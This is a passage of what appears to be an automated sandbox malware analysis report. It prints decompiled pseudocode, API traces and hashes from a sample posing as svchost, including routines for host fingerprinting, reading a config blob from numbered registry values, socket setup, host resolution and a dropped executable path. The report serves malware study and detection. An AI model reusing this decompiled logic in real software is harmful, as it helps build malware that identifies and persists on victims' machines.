                                                                                  • Part of subcall function 0012675C: ReadFile.KERNEL32(000000FF,?,00000040,00128244,00000000,?,74CB43E0,00000000), ref: 00126807
                                                                                  • Part of subcall function 0012675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012681F
                                                                                  • Part of subcall function 0012675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0012683E
                                                                                  • Part of subcall function 0012675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012685C
                                                                                  • Part of subcall function 0012EC2E: GetProcessHeap.KERNEL32(00000000,0012EA27,00000000,0012EA27,00000000), ref: 0012EC41
                                                                                  • Part of subcall function 0012EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0012EC48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 124786226-2070294517
                                                                                • Opcode ID: a808bc832e599ca54025d3dd822468e057cd106567c1b976eebdabddec736280
                                                                                • Instruction ID: 10892c9b0496fbbfce8147487e827a683b202c0e73223f1625e3b5019780e5bd
                                                                                • Opcode Fuzzy Hash: a808bc832e599ca54025d3dd822468e057cd106567c1b976eebdabddec736280
                                                                                • Instruction Fuzzy Hash: A84192B2902129BFEB11FBA0BD81DBE77BCEB24304F14446AF505E2051EB705EA5CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1300 121ac3-121adc LoadLibraryA 1301 121ae2-121af3 GetProcAddress 1300->1301 1302 121b6b-121b70 1300->1302 1303 121af5-121b01 1301->1303 1304 121b6a 1301->1304 1305 121b1c-121b27 GetAdaptersAddresses 1303->1305 1304->1302 1306 121b03-121b12 call 12ebed 1305->1306 1307 121b29-121b2b 1305->1307 1306->1307 1315 121b14-121b1b 1306->1315 1308 121b5b-121b5e 1307->1308 1309 121b2d-121b32 1307->1309 1313 121b69 1308->1313 1314 121b60-121b68 call 12ec2e 1308->1314 1312 121b34-121b3b 1309->1312 1309->1313 1316 121b54-121b59 1312->1316 1317 121b3d-121b52 1312->1317 1313->1304 1314->1313 1315->1305 1316->1308 1316->1312 1317->1316 1317->1317
                                                                                C-Code - Quality: 64%
                                                                                			E00121AC3() {
                                                                                				signed int _v8;
                                                                                				char _v12;
                                                                                				signed int _v16;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr* _t28;
                                                                                				signed int _t39;
                                                                                				void* _t41;
                                                                                				intOrPtr _t43;
                                                                                
                                                                                				_v16 = 0;
                                                                                				_t19 = LoadLibraryA("Iphlpapi.dll");
                                                                                				if(_t19 == 0) {
                                                                                					L15:
                                                                                					return _v16;
                                                                                				}
                                                                                				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
                                                                                				if(_t28 == 0) {
                                                                                					L14:
                                                                                					goto L15;
                                                                                				}
                                                                                				_push( &_v12);
                                                                                				_v8 = 0;
                                                                                				_v12 = 0;
                                                                                				_push(0);
                                                                                				while(1) {
                                                                                					_t23 =  *_t28(2, 0, 0); // executed
                                                                                					_t41 = _t23;
                                                                                					if(_t41 != 0x6f) {
                                                                                						break;
                                                                                					}
                                                                                					_t24 = E0012EBED(_v8, _v12);
                                                                                					if(_t24 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_push( &_v12);
                                                                                					_v8 = _t24;
                                                                                					_push(_t24);
                                                                                				}
                                                                                				if(_t41 != 0) {
                                                                                					L11:
                                                                                					if(_v8 != 0) {
                                                                                						E0012EC2E(_v8);
                                                                                					}
                                                                                					L13:
                                                                                					goto L14;
                                                                                				}
                                                                                				_t26 = _v8;
                                                                                				if(_t26 == 0) {
                                                                                					goto L13;
                                                                                				} else {
                                                                                					goto L8;
                                                                                				}
                                                                                				do {
                                                                                					L8:
                                                                                					_t43 =  *((intOrPtr*)(_t26 + 0x34));
                                                                                					_t39 = 0;
                                                                                					if(_t43 <= 0) {
                                                                                						goto L10;
                                                                                					} else {
                                                                                						goto L9;
                                                                                					}
                                                                                					do {
                                                                                						L9:
                                                                                						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
                                                                                						_t39 = _t39 + 1;
                                                                                					} while (_t39 < _t43);
                                                                                					L10:
                                                                                					_t26 =  *((intOrPtr*)(_t26 + 8));
                                                                                				} while (_t26 != 0);
                                                                                				goto L11;
                                                                                 			}

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00121AD4
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00121AE9
                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00121B20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdaptersAddressAddressesLibraryLoadProc
                                                                                • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                • API String ID: 3646706440-1087626847
                                                                                • Opcode ID: 06b4b904d2232ce43ba86f265ca43eb7cdac7f139de6875a1103de300429a43c
                                                                                • Instruction ID: b67e311525e74d6a6aa014924322751471e71b19ec2de38985b43eac933dbc38
                                                                                • Opcode Fuzzy Hash: 06b4b904d2232ce43ba86f265ca43eb7cdac7f139de6875a1103de300429a43c
                                                                                • Instruction Fuzzy Hash: A911D371E01138BFCB26DBA4EC858EEBBB9EB68B10F144456F009A3140E7304E50DB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 control_flow_graph (basic blocks, then edges)
                                                                                 • 1320 12e3ca-12e3ee RegOpenKeyExA
                                                                                 • 1321 12e3f4-12e3fb
                                                                                 • 1322 12e528-12e52d
                                                                                 • 1323 12e3fe-12e403
                                                                                 • 1324 12e405-12e40f
                                                                                 • 1325 12e411-12e413
                                                                                 • 1326 12e414-12e452 call 12ee08 call 12f1ed RegQueryValueExA
                                                                                 • 1331 12e458-12e486 call 12f1ed RegQueryValueExA
                                                                                 • 1332 12e51d-12e527 RegCloseKey
                                                                                 • 1335 12e488-12e48a
                                                                                 • 1336 12e490-12e4a1 call 12db2e
                                                                                 • 1339 12e4a3-12e4a6
                                                                                 • 1340 12e4a9-12e4d3 call 12f1ed RegQueryValueExA
                                                                                 • 1343 12e4d5-12e4da
                                                                                 • 1344 12e4e8-12e4ea
                                                                                 • 1345 12e4dc-12e4e6
                                                                                 • 1346 12e4ec-12e516 call 122544 call 12e332
                                                                                 • Edges: 1320->1321, 1320->1322, 1321->1323, 1323->1323, 1323->1324, 1324->1325, 1324->1326, 1325->1326, 1326->1331, 1326->1332, 1331->1335, 1332->1322, 1335->1332, 1335->1336, 1336->1332, 1336->1339, 1339->1340, 1340->1343, 1340->1344, 1343->1344, 1343->1345, 1344->1332, 1344->1346, 1345->1340, 1345->1344, 1346->1332
                                                                                C-Code - Quality: 100%
                                                                                 			E0012E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
                                                                                 				// _a4: registry hive handle (0x80000001 = HKEY_CURRENT_USER in the API trace below),
                                                                                 				// _a8: subkey path, _a12: value-name prefix. The data is stored as a run of
                                                                                 				// numbered values <prefix>0, <prefix>1, ... which this routine first sizes and
                                                                                 				// then reads back-to-back into one buffer. Returns 1 on success, 0 otherwise.
                                                                                 				int* _v8;          // current value index
                                                                                 				int _v12;          // cbData in the sizing pass, then the write cursor in the read pass
                                                                                 				void* _v16;        // opened key handle
                                                                                 				intOrPtr _v20;     // position in _v68 where the decimal index is written
                                                                                 				int _v24;          // value type returned by RegQueryValueExA
                                                                                 				int _v28;          // cbData in the read pass
                                                                                 				int _v32;          // total size of all numbered values
                                                                                 				int* _v36;         // return value
                                                                                 				char _v68;         // value-name buffer: prefix (capped at 0x1c bytes) followed by the index
                                                                                 				intOrPtr* _t6;     // not declared by the decompiler: prefix + 1, used for the length count
                                                                                 				long _t50;
                                                                                 				intOrPtr* _t52;
                                                                                 				void* _t56;        // not declared by the decompiler: address of the index digits in _v68
                                                                                 				int _t69;
                                                                                 				intOrPtr _t75;
                                                                                 				int _t78;
                                                                                 				intOrPtr _t80;
                                                                                 				void* _t82;
                                                                                 				void* _t84;
                                                                                 				void* _t85;
                                                                                 				int _t89;
                                                                                 				void* _t91;
                                                                                 				void* _t92;
                                                                                 				void* _t93;
                                                                                 				int _t106;         // not declared by the decompiler: copy of the remaining byte count
                                                                                 
                                                                                 				_t82 = __edx;
                                                                                 				_v36 = 0;
                                                                                 				// 0x20119 = KEY_READ | KEY_WOW64_64KEY
                                                                                 				_t50 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16); // executed
                                                                                 				if(_t50 != 0) {
                                                                                 					L16:
                                                                                 					return _v36;
                                                                                 				}
                                                                                 				// Inline strlen of the prefix, capped at 0x1c so it fits in _v68 together with the index.
                                                                                 				_t52 = _a12;
                                                                                 				_t89 = 0;
                                                                                 				_t6 = _t52 + 1; // 0x1328f9
                                                                                 				_t84 = _t6;
                                                                                 				do {
                                                                                 					_t80 =  *_t52;
                                                                                 					_t52 = _t52 + 1;
                                                                                 				} while (_t80 != 0);
                                                                                 				_t85 = _t52 - _t84;
                                                                                 				_v8 = 0;
                                                                                 				if(_t85 > 0x1c) {
                                                                                 					_t85 = 0x1c;
                                                                                 				}
                                                                                 				E0012EE08( &_v68, _a12, _t85); // copies the prefix into _v68 (memcpy-like)
                                                                                 				_t56 = _t91 + _t85 - 0x40; // &_v68[_t85]: where the index digits are written
                                                                                 				_v12 = 0;
                                                                                 				_v20 = _t91 + _t85 - 0x40;
                                                                                 				E0012F1ED(0, _t56, 0xa); // appends index 0 in base 10 to the prefix (itoa-like)
                                                                                 				_t93 = _t92 + 0x18;
                                                                                 				// Pass 1: query <prefix>0, <prefix>1, ... with a NULL data pointer to sum their sizes.
                                                                                 				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
                                                                                 					L15:
                                                                                 					RegCloseKey(_v16);
                                                                                 					goto L16;
                                                                                 				} else {
                                                                                 					do {
                                                                                 						_t89 = _t89 + _v12;
                                                                                 						_v8 = _v8 + 1;
                                                                                 						_v12 = 0;
                                                                                 						E0012F1ED(_v8, _v20, 0xa);
                                                                                 						_t93 = _t93 + 0xc;
                                                                                 					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
                                                                                 					if(_t89 <= 0) {
                                                                                 						goto L15;
                                                                                 					}
                                                                                 					// Allocate one buffer for the combined data; E0012DB2E stores its address at 0x1336c4.
                                                                                 					_v32 = _t89;
                                                                                 					E0012DB2E(_t89);
                                                                                 					_t69 =  *0x1336c4; // 0x0
                                                                                 					if(_t69 == 0) {
                                                                                 						goto L15;
                                                                                 					}
                                                                                 					// Pass 2: read each value into the buffer at the current write cursor.
                                                                                 					_v12 = _t69;
                                                                                 					_v8 = 0;
                                                                                 					while(1) {
                                                                                 						_v28 = _t89;
                                                                                 						E0012F1ED(_v8, _v20, 0xa);
                                                                                 						_t93 = _t93 + 0xc;
                                                                                 						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
                                                                                 							break;
                                                                                 						}
                                                                                 						_t78 = _v28;
                                                                                 						if(_t78 == 0) {
                                                                                 							break;
                                                                                 						}
                                                                                 						_v12 = _v12 + _t78; // advance the write cursor by the bytes just read
                                                                                 						_t89 = _t89 - _t78;
                                                                                 						_v8 = _v8 + 1;
                                                                                 						if(_t89 > 0) {
                                                                                 							continue;
                                                                                 						}
                                                                                 						break;
                                                                                 					}
                                                                                 					// The data is only handed on when the buffer was filled exactly.
                                                                                 					_t106 = _t89;
                                                                                 					if(_t89 == 0) {
                                                                                 						_t75 =  *0x1336c4; // 0x0
                                                                                 						E00122544(_t75, _t75, _v32, 0xe4, 0xc8);
                                                                                 						E0012E332(_t82, _t106,  *0x1336c4, _v32);
                                                                                 						_v36 = 1;
                                                                                 					}
                                                                                 					goto L15;
                                                                                 				}
                                                                                 			}


                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,0012E5F2,00000000,00020119,0012E5F2,001322F8), ref: 0012E3E6
                                                                                • RegQueryValueExA.ADVAPI32(0012E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0012E44E
                                                                                • RegQueryValueExA.ADVAPI32(0012E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0012E482
                                                                                • RegQueryValueExA.ADVAPI32(0012E5F2,?,00000000,?,80000001,?), ref: 0012E4CF
                                                                                • RegCloseKey.ADVAPI32(0012E5F2,?,?,?,?,000000C8,000000E4), ref: 0012E520
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID:
                                                                                • API String ID: 1586453840-0
                                                                                • Opcode ID: 697f948e24f9fbb2cebf8bdb0211688f585b02892b16f287200eac4d24391052
                                                                                • Instruction ID: 507ac6ad1dff945a62036bf8d530b6d523ed75289fb26e031a291e4e4940973b
                                                                                • Opcode Fuzzy Hash: 697f948e24f9fbb2cebf8bdb0211688f585b02892b16f287200eac4d24391052
                                                                                • Instruction Fuzzy Hash: 4041F4B2D0022DBFEF11AF94EC81DEEBBB9EB18344F544466F911E6150E3319A658B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 control_flow_graph (basic blocks)
                                                                                 • 1351 12f26d-12f303 setsockopt * 5
                                                                                APIs
                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0012F2A0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0012F2C0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0012F2DD
                                                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0012F2EC
                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0012F2FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: setsockopt
                                                                                • String ID:
                                                                                • API String ID: 3981526788-0
                                                                                • Opcode ID: 9e7ae06f7ed88f4e4d35f6c8431512c1092b17a0b313100f8acbedfa4b22ff16
                                                                                • Instruction ID: d6910874bd6481b386edd8926a18e198e7632cfdf51e3eb6eb67553e31f1739c
                                                                                • Opcode Fuzzy Hash: 9e7ae06f7ed88f4e4d35f6c8431512c1092b17a0b313100f8acbedfa4b22ff16
                                                                                • Instruction Fuzzy Hash: F8110AB2A40248BAEF11DF94CD85FDE7FBDEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 control_flow_graph (basic blocks, then edges)
                                                                                 • 1352 121bdf-121c04 call 121ac3
                                                                                 • 1354 121c09-121c0b
                                                                                 • 1355 121c5a-121c5e
                                                                                 • 1356 121c0d-121c1d GetComputerNameA
                                                                                 • 1357 121c45-121c57 GetVolumeInformationA
                                                                                 • 1358 121c1f-121c24
                                                                                 • 1359 121c26-121c3b
                                                                                 • 1360 121c3d-121c3f
                                                                                 • 1361 121c41-121c43
                                                                                 • Edges: 1352->1354, 1354->1355, 1354->1356, 1356->1357, 1356->1358, 1357->1355, 1358->1357, 1358->1359, 1359->1359, 1359->1360, 1360->1357, 1360->1361, 1361->1355
                                                                                C-Code - Quality: 76%
                                                                                 			E00121BDF() {
                                                                                 				// Derives a machine identifier with three fallbacks: E00121AC3 first (by its
                                                                                 				// reference addresses, the routine holding the GetAdaptersAddresses calls listed
                                                                                 				// above), then a checksum of the computer name, then the volume serial number.
                                                                                 				long _v8;          // size of the name buffer passed to GetComputerNameA (0xf)
                                                                                 				long _v12;         // volume serial number
                                                                                 				void* _v27;
                                                                                 				char _v28;         // 16-byte computer-name buffer, zeroed by the stos sequence below
                                                                                 				void* _t14;
                                                                                 				signed int _t21;   // byte index into the computer name
                                                                                 				signed int _t30;   // running checksum of the computer name
                                                                                 				void* _t31;        // frame pointer; the loop reads the name bytes relative to it
                                                                                 
                                                                                 				_v28 = 0;
                                                                                 				asm("stosd");
                                                                                 				asm("stosd");
                                                                                 				asm("stosd");
                                                                                 				asm("stosw");
                                                                                 				_t30 = 0;
                                                                                 				_v12 = 0;
                                                                                 				asm("stosb");
                                                                                 				_v8 = 0xf;
                                                                                 				_t14 = E00121AC3(); // executed
                                                                                 				if(_t14 == 0) {
                                                                                 					if(GetComputerNameA( &_v28,  &_v8) == 0) {
                                                                                 						L6:
                                                                                 						// NULL root path: GetVolumeInformationA uses the volume of the current directory.
                                                                                 						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
                                                                                 						return _v12;
                                                                                 					}
                                                                                 					_t21 = 0;
                                                                                 					if(_v8 <= 0) {
                                                                                 						goto L6;
                                                                                 					} else {
                                                                                 						goto L3;
                                                                                 					}
                                                                                 					do {
                                                                                 						L3:
                                                                                 						// XOR each name byte into the checksum, shifted according to its position.
                                                                                 						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
                                                                                 						_t21 = _t21 + 1;
                                                                                 					} while (_t21 < _v8);
                                                                                 					if(_t30 == 0) {
                                                                                 						goto L6;
                                                                                 					}
                                                                                 					return _t30;
                                                                                 				}
                                                                                 				return _t14;
                                                                                 			}


                                                                                APIs
                                                                                  • Part of subcall function 00121AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00121AD4
                                                                                  • Part of subcall function 00121AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00121AE9
                                                                                  • Part of subcall function 00121AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00121B20
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00121C15
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00121C51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: hi_id$localcfg
                                                                                • API String ID: 2794401326-2393279970
                                                                                • Opcode ID: a595c6f7ba6949d97808c9f7dcd62cff2fcfc956b45c6556771f38243fa341d5
                                                                                • Instruction ID: 3f704b001dcdfb9c0a11fe411a4e3021ad49184b366a03c25e96ad24f8f87f9a
                                                                                • Opcode Fuzzy Hash: a595c6f7ba6949d97808c9f7dcd62cff2fcfc956b45c6556771f38243fa341d5
                                                                                • Instruction Fuzzy Hash: 2C019276A40128BFEB14DAF8DCC59EFBBBCEB58785F100475E602E3100D3309E5486A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 60%
                                                                                			E00121B71() {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				void* _v27;
                                                                                				char _v28;
                                                                                				signed int _t12;
                                                                                				signed int _t28;
                                                                                
                                                                                				_v28 = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosw");
                                                                                				_v8 = 0;
                                                                                				asm("stosb");
                                                                                				_v12 = 0xf;
                                                                                				_t12 = E00121AC3(); // executed
                                                                                				GetComputerNameA( &_v28,  &_v12);
                                                                                				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
                                                                                				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
                                                                                				_v8 = _t28;
                                                                                				if(_t28 == 0) {
                                                                                					return E0012ECA5() & 0x7fffffff;
                                                                                				}
                                                                                				return _t28;
                                                                                			}










                                                                                APIs
                                                                                  • Part of subcall function 00121AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00121AD4
                                                                                  • Part of subcall function 00121AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00121AE9
                                                                                  • Part of subcall function 00121AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00121B20
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00121BA3
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00121EFD,00000000,00000000,00000000,00000000), ref: 00121BB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: localcfg
                                                                                • API String ID: 2794401326-1857712256
                                                                                • Opcode ID: de1c2aedf2d51f123fdbc60bd80e55816cdc592909a6f4d2240b9a172f2b23cd
                                                                                • Instruction ID: b493ea33ef6ef3e1e6de21bb85bddba1b714e094987c13205638defc1d1a75a6
                                                                                • Opcode Fuzzy Hash: de1c2aedf2d51f123fdbc60bd80e55816cdc592909a6f4d2240b9a172f2b23cd
                                                                                • Instruction Fuzzy Hash: 8B014BB6D00118BFEB019BE9DC819EFFABCAB58650F150162A601E7151D6705E0846A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • inet_addr.WS2_32(00000001), ref: 00122693
                                                                                • gethostbyname.WS2_32(00000001), ref: 0012269F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg
                                                                                • API String ID: 1594361348-2401304539
                                                                                • Opcode ID: a8d70bb378e131d7030703118137f8fd901e2cb0e1ed698b1c99471a95276b81
                                                                                • Instruction ID: 3ef704f52b759766fed93d5d91a0ef9b0778e61f0313d6cb9df9f5e1230e8d64
                                                                                • Opcode Fuzzy Hash: a8d70bb378e131d7030703118137f8fd901e2cb0e1ed698b1c99471a95276b81
                                                                                • Instruction Fuzzy Hash: 8DE0C732204021AFCB118B28F848ACA3BE4EF0A330F028180F840E32A0D770ECC08B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0012E52E(void* __edx, void* __eflags) {
                                                                                				long _v4;
                                                                                				void* __ecx;
                                                                                				void* _t9;
                                                                                				void* _t11;
                                                                                				void* _t17;
                                                                                				long _t20;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				void* _t25;
                                                                                				void* _t28;
                                                                                				void* _t32;
                                                                                				void* _t37;
                                                                                				void* _t40;
                                                                                				void* _t44;
                                                                                
                                                                                				_t44 = __eflags;
                                                                                				_t32 = __edx;
                                                                                				E0012DD05();
                                                                                				_t28 = E0012DBCF(_t44, 0x80000000, 3);
                                                                                				_pop(_t31);
                                                                                				if(_t28 == 0xffffffff) {
                                                                                					L6:
                                                                                					_t9 = E00122544(0x1328f8, 0x1310d0, 7, 0xe4, 0xc8);
                                                                                					_t11 = E0012E3CA(_t32, 0x80000001, E00122544(0x1322f8, 0x1310bc, 0x14, 0xe4, 0xc8), _t9); // executed
                                                                                					_t40 = _t37 + 0x34;
                                                                                					if(_t11 == 0) {
                                                                                						_t17 = E00122544(0x1328f8, 0x1310d0, 7, 0xe4, 0xc8);
                                                                                						E0012E3CA(_t32, 0x80000001, E00122544(0x1322f8, 0x1310a0, 0x19, 0xe4, 0xc8), _t17); // executed
                                                                                						_t40 = _t40 + 0x34;
                                                                                					}
                                                                                					E0012EE2A(_t31, 0x1322f8, 0, 0x100);
                                                                                					E0012EE2A(_t31, 0x1328f8, 0, 0x100);
                                                                                					E0012DD69();
                                                                                					return 1;
                                                                                				}
                                                                                				_t20 = GetFileSize(_t28, 0);
                                                                                				_v4 = _t20;
                                                                                				if(_t20 != 0) {
                                                                                					E0012DB2E(_t20);
                                                                                					_t23 =  *0x1336c4; // 0x0
                                                                                					_pop(_t31);
                                                                                					if(_t23 != 0) {
                                                                                						_t31 =  &_v4;
                                                                                						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
                                                                                						_t48 = _t24;
                                                                                						if(_t24 != 0) {
                                                                                							_t25 =  *0x1336c4; // 0x0
                                                                                							E00122544(_t25, _t25, _v4, 0xe4, 0xc8);
                                                                                							E0012E332(_t32, _t48,  *0x1336c4, _v4);
                                                                                							_t37 = _t37 + 0x1c;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				CloseHandle(_t28);
                                                                                				goto L6;
                                                                                			}


















                                                                                APIs
                                                                                  • Part of subcall function 0012DD05: GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                  • Part of subcall function 0012DD05: InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                  • Part of subcall function 0012DD05: GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,74CB43E0,?,00000000,?,0012A445), ref: 0012E558
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,74CB43E0,?,00000000,?,0012A445), ref: 0012E583
                                                                                • CloseHandle.KERNEL32(00000000,?,74CB43E0,?,00000000,?,0012A445), ref: 0012E5B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                • String ID:
                                                                                • API String ID: 3683885500-0
                                                                                • Opcode ID: 8a9d4a0e6dde61faee43dedd9d83a20cd56723bc88846c3612feabb3036fc5b8
                                                                                • Instruction ID: a8d9ea6b904e60eec8d58858998c41e13c79d13e7711a48368c2258ab00e383d
                                                                                • Opcode Fuzzy Hash: 8a9d4a0e6dde61faee43dedd9d83a20cd56723bc88846c3612feabb3036fc5b8
                                                                                • Instruction Fuzzy Hash: B121F7B2A403207EE6257B21BC07FAB3A9CDB65750F000518FA0AA11D3FB61D970C6F1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0012877E() {
                                                                                				char _v256;
                                                                                				void* _t16;
                                                                                				char _t33;
                                                                                				char* _t36;
                                                                                				char _t45;
                                                                                				char _t47;
                                                                                				void* _t52;
                                                                                				void* _t53;
                                                                                
                                                                                				_t52 =  &_v256;
                                                                                				if(( *0x132f18 & 0x00000001) == 0) {
                                                                                					 *0x132f18 =  *0x132f18 | 0x00000001;
                                                                                					 *0x132f14 = E0012F04E(0);
                                                                                				}
                                                                                				if(( *0x132f18 & 0x00000002) == 0) {
                                                                                					 *0x132f18 =  *0x132f18 | 0x00000002;
                                                                                					 *0x132f10 = E0012F04E(0);
                                                                                				}
                                                                                				_t51 = "ip";
                                                                                				_t49 = "localcfg";
                                                                                				_t47 = E0012E819(1, "localcfg", "ip", 0);
                                                                                				_t53 = _t52 + 0x10;
                                                                                				if(_t47 != 0 && E001226B2(_t47,  &_v256) != 0) {
                                                                                					E0012E8A1(_t45, 1, _t49, "rresolv",  &_v256);
                                                                                					_t53 = _t53 + 0x10;
                                                                                				}
                                                                                				L7:
